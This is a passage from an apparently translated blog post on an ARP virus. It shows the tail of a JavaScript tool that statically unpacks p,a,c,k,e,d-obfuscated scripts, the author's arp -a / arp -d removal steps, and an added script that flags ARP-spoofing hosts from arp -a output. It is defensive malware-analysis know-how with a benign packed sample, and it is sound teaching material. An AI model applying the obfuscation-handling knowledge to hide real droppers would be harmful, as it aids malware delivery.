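const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 1="\\4\\5";0.3(1)',62,6,'document|s|var|write|x68|x69'.split('|'),0,{}))`;

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  const unpacked = unpackPacked(PACKED_SAMPLE);
  console.log('unpacked :', unpacked);
  console.log('layers   :', peelEscapeLayers(unpacked));
  console.log('twice    :', peelEscapeLayers('\\x5c\\x78\\x36\\x38'));
}
```

Because the p,a,c,k,e,d wrapper is only a dictionary substitution, feeding it to eval is unnecessary; the static route also never runs whatever the unpacked text contains, which matters when that text is itself a dropper. The same regular-expression approach works on the base-36 variant seen in the T368.htm sample, since only the token alphabet differs.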
Removal: after talking about the attack for so long, I have only analyzed what the ARP virus was doing while it attacked. Next I will talk about removing it. There are many related tutorials on the Internet, so let me just briefly summarize my own removal process;
1. If an ARP virus is detected, first find the computer that has been infected.
2. Disconnect that machine from the network and disinfect it.
3. Restore the LAN.
The first step is the most critical. How do we find the machine?
Open Network Neighborhood on any client in the LAN, view the workgroup computers and wait until the list has refreshed. Then quickly click Start --> Run --> cmd --> arp -a and press Enter; if there are many machines, run arp -a several times and check the output carefully. You will find that one machine's MAC address is the same as the gateway's. Congratulations, that is the source of the infection!
Go over to that machine (haha, so much nonsense); I believe everyone has plenty of experience with the rest of the work: disinfect! Boot into safe mode and install anti-virus software, or simply reinstall the machine; in short, get rid of the virus;
Finally, on any machine that still cannot open web pages, run: Start --> Run --> cmd --> arp -d and press Enter.
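The check in the procedure above (one MAC address shared by the gateway and another host in the arp -a table) is easy to automate so it can be repeated on a large LAN instead of eyeballing the list. The script below is an added example, not from the original post: it parses the Windows arp -a table and reports every host whose MAC matches the gateway's, plus any other MAC claimed by several IPs. The table text and the gateway address 192.168.1.1 are constructed sample values; the function names are this example's own.

```javascript
'use strict';

// Constructed sample of Windows "arp -a" output; 192.168.1.37 is the poisoned host
// because it answers with the gateway's MAC.
const SAMPLE_ARP_OUTPUT = `
Interface: 192.168.1.23 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.37          00-11-22-33-44-55     dynamic
  192.168.1.50          aa-bb-cc-dd-ee-01     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
`;

// Parse the table into {ip, mac, type} entries; MACs are normalised to lower-case
// dash form so Windows (aa-bb-...) and Unix (aa:bb:...) spellings compare equal.
function parseArpTable(text) {
  const row = /^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)/i;
  const entries = [];
  for (const line of text.split('\n')) {
    const m = row.exec(line);
    if (m) entries.push({ ip: m[1], mac: m[2].toLowerCase().replace(/:/g, '-'), type: m[3].toLowerCase() });
  }
  return entries;
}

// Group IPs by MAC (ignoring the broadcast address). A MAC shared with the gateway
// is the post's tell-tale sign; any other MAC with several IPs is worth a look too.
function findArpSpoofSuspects(text, gatewayIp) {
  const entries = parseArpTable(text);
  const byMac = new Map();
  for (const e of entries) {
    if (e.mac === 'ff-ff-ff-ff-ff-ff') continue;
    if (!byMac.has(e.mac)) byMac.set(e.mac, []);
    byMac.get(e.mac).push(e.ip);
  }
  const gw = entries.find(e => e.ip === gatewayIp);
  const gatewayMac = gw ? gw.mac : null;
  const suspects = gatewayMac ? byMac.get(gatewayMac).filter(ip => ip !== gatewayIp) : [];
  const duplicates = [...byMac].filter(([, ips]) => ips.length > 1).map(([mac, ips]) => ({ mac, ips }));
  return { gatewayMac, suspects, duplicates };
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(findArpSpoofSuspects(SAMPLE_ARP_OUTPUT, '192.168.1.1'));
}
```

On a live network, pipe the real command output into parseArpTable (for example by reading it from a file saved with arp -a > arp.txt) and run the check a few times, as the post suggests, because a freshly refreshed cache is what makes the duplicate visible.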

Finally, everything has returned to calm. What a sense of accomplishment!

My first official blog technical article is finally finished. I hope you enjoy it!
